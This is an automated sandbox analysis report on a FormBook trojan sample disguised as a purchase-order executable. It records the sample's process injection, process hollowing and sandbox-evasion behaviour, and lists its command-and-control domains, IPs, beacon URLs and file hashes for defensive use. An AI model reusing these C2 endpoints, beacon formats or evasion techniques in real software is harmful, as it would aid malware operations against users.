          Source: Yara matchFile source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.2.PO 56720012359.exe.2d10000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.PO 56720012359.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.PO 56720012359.exe.2d10000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.PO 56720012359.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.291418914.000000000708B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.328750105.0000000001280000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507566355.0000000003540000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.275696203.000000000708B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.329627291.00000000015F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.505826920.0000000000DC0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.252875789.0000000002D10000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.507780736.0000000003570000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.328058419.0000000000400000.00000040.00020000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsService Execution2Windows Service3Windows Service3Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Application Shimming1Process Injection512Virtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery151Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Application Shimming1Process Injection512Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information2LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery112VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 483537 Sample: PO 56720012359.exe Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 31 www.la-bio-geo.com 2->31 33 www.allfyllofficial.com 2->33 45 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->45 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 6 other signatures 2->51 11 PO 56720012359.exe 1 2->11         started        signatures3 process4 signatures5 63 Maps a DLL or memory area into another process 11->63 14 PO 56720012359.exe 11->14         started        17 conhost.exe 11->17         started        process6 signatures7 65 Modifies the context of a thread in another process (thread injection) 14->65 67 Maps a DLL or memory area into another process 14->67 69 Sample uses process hollowing technique 14->69 71 Queues an APC in another process (thread injection) 14->71 19 explorer.exe 14->19 injected process8 dnsIp9 35 www.mobilewz.com 23.252.68.226, 80 SAYFANETTR Turkey 19->35 37 www.stuntfighting.com 156.252.96.170, 49774, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 19->37 39 4 other IPs or domains 19->39 53 System process connects to network (likely due to code injection or exploit) 19->53 23 cscript.exe 12 19->23         started        signatures10 process11 dnsIp12 41 www.mobilewz.com 23->41 43 192.168.2.1 unknown unknown 23->43 55 Self deletion via cmd delete 23->55 57 Modifies the context of a thread in another process (thread injection) 23->57 59 Maps a DLL or memory area into another process 23->59 61 Tries to detect virtualization through RDTSC time measurements 23->61 27 cmd.exe 1 23->27         started        signatures13 process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO 56720012359.exe51%VirustotalBrowse
          PO 56720012359.exe40%ReversingLabsWin32.Trojan.Brresmon

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.PO 56720012359.exe.2d10000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.PO 56720012359.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          healthy-shack.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://i1.cdn-image.com/__media__/pics/12471/kwbg.jpg)0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix0%Avira URL Cloudsafe
          http://www.stuntfighting.com/b6cu/?y2=_npT80v0M2&L8fhOFRP=0cNTwCf3GfppWKB0T1XESIgtEFKjNX2tylJLJaVzm8N2XRqnUHRn8w7/tpdMCfw1z2P+0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf0%Avira URL Cloudsafe
          http://findquickresultsnow.com/sk-logabpstatus.php?a=NXM3Y25kMzZuSzNqUXBxY0xQbmloMGRRSnhhT3VRc1EvRkt0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf0%Avira URL Cloudsafe
          http://findquickresultsnow.com/display.cfm0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff20%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/12471/libgh.png)0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff20%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/12471/arrow.png)0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/12471/bodybg.png)0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/12471/logo.png)0%Avira URL Cloudsafe
          http://findquickresultsnow.com/High_Speed_Internet.cfm?domain=allfyllofficial.com&fp=CDQ1BUiKVEwbYLN0%Avira URL Cloudsafe
          http://www.fmodesign.com/b6cu/?L8fhOFRP=v4/7wB6X+ne64BMfzkTnNfrtxR+fNWuSRi8sP9TYFcLz2AIA8KGD8NWIHbMwW3JjWqpf&y2=_npT80v0M20%Avira URL Cloudsafe
          http://findquickresultsnow.com/px.js?ch=20%Avira URL Cloudsafe
          http://findquickresultsnow.com/px.js?ch=10%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/pics/12471/libg.png)0%Avira URL Cloudsafe
          www.allfyllofficial.com/b6cu/100%Avira URL Cloudmalware
          http://www.mobilewz.com/user0%Avira URL Cloudsafe
          http://www.healthy-shack.com/b6cu/?y2=_npT80v0M2&L8fhOFRP=PWSncnBGX0y4t94MIYhADTl/ZWH8Ec5DThT4C2sI40tRDeDzLuqQGdQiyNRL5TLkWfMz0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff0%Avira URL Cloudsafe
          http://www.mobilewz.com/0%Avira URL Cloudsafe
          http://www.mobilewz.com/b6cu/?y2=_npT80v0M2&L8fhOFRP=hpZKB5Wc2v3dAucjERLG4WeGvlE/NyvmoCIino6AurWFNcX0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r0%Avira URL Cloudsafe
          http://i1.cdn-image.com/__media__/js/min.js?v2.20%URL Reputationsafe
          http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff0%Avira URL Cloudsafe
          http://findquickresultsnow.com/Parental_Control.cfm?domain=allfyllofficial.com&fp=CDQ1BUiKVEwbYLNmNk0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.mobilewz.com
          		23.252.68.226
          		truetrue
            		unknown
            www.fmodesign.com
            		154.81.100.18
            		truetrue
              		unknown
              healthy-shack.com
              		107.180.44.148
              		truetrueunknown
              www.allfyllofficial.com
              		50.87.144.47
              		truetrue
                		unknown
                www.stuntfighting.com
                		156.252.96.170
                		truetrue
                  		unknown
                  www.la-bio-geo.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.healthy-shack.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.arerasols.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://www.stuntfighting.com/b6cu/?y2=_npT80v0M2&L8fhOFRP=0cNTwCf3GfppWKB0T1XESIgtEFKjNX2tylJLJaVzm8N2XRqnUHRn8w7/tpdMCfw1z2P+true
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.fmodesign.com/b6cu/?L8fhOFRP=v4/7wB6X+ne64BMfzkTnNfrtxR+fNWuSRi8sP9TYFcLz2AIA8KGD8NWIHbMwW3JjWqpf&y2=_npT80v0M2true
                        • Avira URL Cloud: safe
                        		unknown
                        www.allfyllofficial.com/b6cu/true
                        • Avira URL Cloud: malware
                        		low
                        http://www.healthy-shack.com/b6cu/?y2=_npT80v0M2&L8fhOFRP=PWSncnBGX0y4t94MIYhADTl/ZWH8Ec5DThT4C2sI40tRDeDzLuqQGdQiyNRL5TLkWfMztrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://i1.cdn-image.com/__media__/pics/12471/kwbg.jpg)cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otfcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otfcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/pics/12471/search-icon.png)cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefixcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttfcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://findquickresultsnow.com/sk-logabpstatus.php?a=NXM3Y25kMzZuSzNqUXBxY0xQbmloMGRRSnhhT3VRc1EvRktcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttfcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://findquickresultsnow.com/display.cfmcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eotcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/pics/12471/libgh.png)cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefixcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eotcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/pics/12471/arrow.png)cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/pics/12471/bodybg.png)cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/pics/12471/logo.png)cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://findquickresultsnow.com/High_Speed_Internet.cfm?domain=allfyllofficial.com&fp=CDQ1BUiKVEwbYLNcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://findquickresultsnow.com/px.js?ch=2cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://findquickresultsnow.com/px.js?ch=1cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/pics/12471/libg.png)cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.mobilewz.com/usercscript.exe, 00000010.00000002.508876093.0000000003683000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-bcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woffcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.mobilewz.com/cscript.exe, 00000010.00000002.508876093.0000000003683000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.mobilewz.com/b6cu/?y2=_npT80v0M2&L8fhOFRP=hpZKB5Wc2v3dAucjERLG4WeGvlE/NyvmoCIino6AurWFNcXcscript.exe, 00000010.00000002.508876093.0000000003683000.00000004.00000020.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-rcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/js/min.js?v2.2cscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://i1.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woffcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://findquickresultsnow.com/Parental_Control.cfm?domain=allfyllofficial.com&fp=CDQ1BUiKVEwbYLNmNkcscript.exe, 00000010.00000002.511976591.00000000059B2000.00000004.00020000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        156.252.96.170
                        		www.stuntfighting.comSeychelles
                        		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                        154.81.100.18
                        		www.fmodesign.comSeychelles
                        		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                        107.180.44.148
                        		healthy-shack.comUnited States
                        		26496AS-26496-GO-DADDY-COM-LLCUStrue
                        23.252.68.226
                        		www.mobilewz.comTurkey
                        		59447SAYFANETTRtrue

                        Private

                        IP
                        192.168.2.1

                        General Information

                        Joe Sandbox Version:33.0.0 White Diamond
                        Analysis ID:483537
                        Start date:15.09.2021
                        Start time:08:34:10
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 24s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Sample file name:PO 56720012359.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:26
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@8/0@8/5
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 30.6% (good quality ratio 28.4%)
                        • Quality average: 78.3%
                        • Quality standard deviation: 29.5%
                        HCA Information:
                        • Successful, ratio: 96%
                        • Number of executed functions: 86
                        • Number of non-executed functions: 169
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                        • Excluded IPs from analysis (whitelisted): 92.122.145.220, 23.35.236.56, 20.82.209.183, 40.112.88.60, 20.50.102.62, 23.216.77.209, 23.216.77.208
                        • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        154.81.100.18SOA.exeGet hashmaliciousBrowse
                        • www.fmodesign.com/b6cu/?2dpHPlu=v4/7wB6X+ne64BMfzkTnNfrtxR+fNWuSRi8sP9TYFcLz2AIA8KGD8NWIHYsgZWZbIPAY&I2Jh=qZzPvfA0dTw
                        23.252.68.226vbc.exeGet hashmaliciousBrowse

                          Domains

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          www.stuntfighting.comNew Order.exeGet hashmaliciousBrowse
                          • 156.252.96.170
                          www.allfyllofficial.comvbc.exeGet hashmaliciousBrowse
                          • 50.87.144.47
                          USD INV#1191189.xlsxGet hashmaliciousBrowse
                          • 50.87.144.47
                          New Order.exeGet hashmaliciousBrowse
                          • 50.87.144.47
                          SOA.exeGet hashmaliciousBrowse
                          • 50.87.144.47
                          www.mobilewz.comvbc.exeGet hashmaliciousBrowse
                          • 23.252.68.226
                          www.fmodesign.comSOA.exeGet hashmaliciousBrowse
                          • 154.81.100.18

                          ASN

                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                          POWERLINE-AS-APPOWERLINEDATACENTERHKavxeC9WssiGet hashmaliciousBrowse
                          • 154.93.93.143
                          KXM253rCpWGet hashmaliciousBrowse
                          • 45.202.220.126
                          Antisocial.x86Get hashmaliciousBrowse
                          • 45.202.220.145
                          Antisocial.armGet hashmaliciousBrowse
                          • 45.202.220.132
                          Bdcuhmcgbsvmxhmuasrulqqnfbjdnogomk.exeGet hashmaliciousBrowse
                          • 156.250.206.123
                          wqrPKr29CaGet hashmaliciousBrowse
                          • 156.242.206.11
                          mzPc4AjQ56.exeGet hashmaliciousBrowse
                          • 154.201.233.72
                          2kPrDBMxZVGet hashmaliciousBrowse
                          • 103.57.228.86
                          vbc(2).exeGet hashmaliciousBrowse
                          • 45.195.163.111
                          h3YuU2ccMI.exeGet hashmaliciousBrowse
                          • 192.151.255.36
                          sora.arm7Get hashmaliciousBrowse
                          • 154.86.70.142
                          Oro00CeYE0Get hashmaliciousBrowse
                          • 103.57.228.89
                          GbqSO8wDkYGet hashmaliciousBrowse
                          • 154.86.69.210
                          x86Get hashmaliciousBrowse
                          • 156.251.7.133
                          mSR4x9NnMI2lSah.exeGet hashmaliciousBrowse
                          • 160.124.133.245
                          Letter of Intent.exeGet hashmaliciousBrowse
                          • 156.242.151.99
                          Quotation#QO210109A87356.exeGet hashmaliciousBrowse
                          • 154.195.203.177
                          009547789723_pdf.exeGet hashmaliciousBrowse
                          • 156.252.77.184
                          Invoice BL Packing List.exeGet hashmaliciousBrowse
                          • 156.242.183.44
                          peach.armGet hashmaliciousBrowse
                          • 154.208.183.93
                          DXTL-HKDXTLTseungKwanOServiceHKswift_copy_MT103_pdf.exeGet hashmaliciousBrowse
                          • 45.203.64.72
                          AWB3455938544.exeGet hashmaliciousBrowse
                          • 154.214.139.85
                          Additional Order Qty 197.xlsxGet hashmaliciousBrowse
                          • 45.203.107.205
                          KzWXGmiJxSGet hashmaliciousBrowse
                          • 122.11.98.106
                          sora.arm7Get hashmaliciousBrowse
                          • 154.221.154.89
                          ZvUMlvUmXk.exeGet hashmaliciousBrowse
                          • 154.90.71.234
                          NK9sAZ63ss.exeGet hashmaliciousBrowse
                          • 154.90.71.234
                          F8fJe0qblC.exeGet hashmaliciousBrowse
                          • 154.90.71.234
                          Antisocial.armGet hashmaliciousBrowse
                          • 156.235.189.137
                          SOA.exeGet hashmaliciousBrowse
                          • 154.81.100.18
                          iBFtnxuPRcuCSPs.exeGet hashmaliciousBrowse
                          • 45.197.114.217
                          XnLs7VLx1vGet hashmaliciousBrowse
                          • 45.197.112.62
                          Order no.1480-G22-21202109.xlsxGet hashmaliciousBrowse
                          • 45.203.107.205
                          YeDppKwP6zGet hashmaliciousBrowse
                          • 45.196.195.140
                          Kp6SDRr8xdGet hashmaliciousBrowse
                          • 156.235.135.133
                          3RBawvxxeY.exeGet hashmaliciousBrowse
                          • 156.239.92.147
                          Eklenen yeni siparis.exeGet hashmaliciousBrowse
                          • 156.232.245.157
                          DHL Shipping INV#BL.exeGet hashmaliciousBrowse
                          • 156.245.221.194
                          zFDNFIXYHnGet hashmaliciousBrowse
                          • 154.93.250.174
                          sora.arm7Get hashmaliciousBrowse
                          • 154.86.169.205

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          No created / dropped files found

                          Static File Info

                          General

                          File type:PE32 executable (console) Intel 80386, for MS Windows
                          Entropy (8bit):7.763697037341853
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:PO 56720012359.exe
                          File size:304128
                          MD5:839c75a88734aaf014ef0c3d77ce9109
                          SHA1:10d79cb8e51fd30bfff63b2465ba0e111f6dd500
                          SHA256:1829af596150521350d812c07f81226755d397e4755f649e083cc06de7d6f402
                          SHA512:e6feddaf0616f781a8d9de9fd68e78654c2be2c1e5bff676fc4d78de7ca6f8f6cace5245117d7554c4f50452c6d7d60ab5a62d1f66580ed8707ec835d91cc551
                          SSDEEP:6144:z9GBfOEiU6y+B0yoP9/NbU2Q2QNW7rdmtJJTbutFB1:zgBmEiU6/aF/Ja2oW/dmtJwTB1
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ivc.-...-...-... E..5... E.."... E..H...9|..>...-...X....I..,....I..,....I..,...Rich-...........................PE..L...[SAa...

                          File Icon

                          Icon Hash:4f050d0d0d054f90

                          Static PE Info

                          General

                          Entrypoint:0x4029fb
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows cui
                          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                          DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x6141535B [Wed Sep 15 01:58:51 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:6
                          OS Version Minor:0
                          File Version Major:6
                          File Version Minor:0
                          Subsystem Version Major:6
                          Subsystem Version Minor:0
                          Import Hash:c2e2fa89aec204ac5f3945ce98025d14

                          Entrypoint Preview

                          Instruction
                          call 00007FDFFCC68396h
                          jmp 00007FDFFCC67210h
                          push ebp
                          mov ebp, esp
                          mov eax, dword ptr [ebp+08h]
                          mov eax, dword ptr [eax]
                          cmp dword ptr [eax], E06D7363h
                          jne 00007FDFFCC673B7h
                          cmp dword ptr [eax+10h], 03h
                          jne 00007FDFFCC673B1h
                          mov eax, dword ptr [eax+14h]
                          cmp eax, 19930520h
                          je 00007FDFFCC673ADh
                          cmp eax, 19930521h
                          je 00007FDFFCC673A6h
                          cmp eax, 19930522h
                          je 00007FDFFCC6739Fh
                          cmp eax, 01994000h
                          je 00007FDFFCC67398h
                          xor eax, eax
                          pop ebp
                          retn 0004h
                          call 00007FDFFCC68684h
                          int3
                          push 00402A05h
                          call 00007FDFFCC68A35h
                          pop ecx
                          xor eax, eax
                          ret
                          push ebp
                          mov ebp, esp
                          push esi
                          call 00007FDFFCC67634h
                          mov esi, eax
                          test esi, esi
                          je 00007FDFFCC674DBh
                          mov edx, dword ptr [esi+5Ch]
                          mov ecx, edx
                          push edi
                          mov edi, dword ptr [ebp+08h]
                          cmp dword ptr [ecx], edi
                          je 00007FDFFCC6739Fh
                          add ecx, 0Ch
                          lea eax, dword ptr [edx+00000090h]
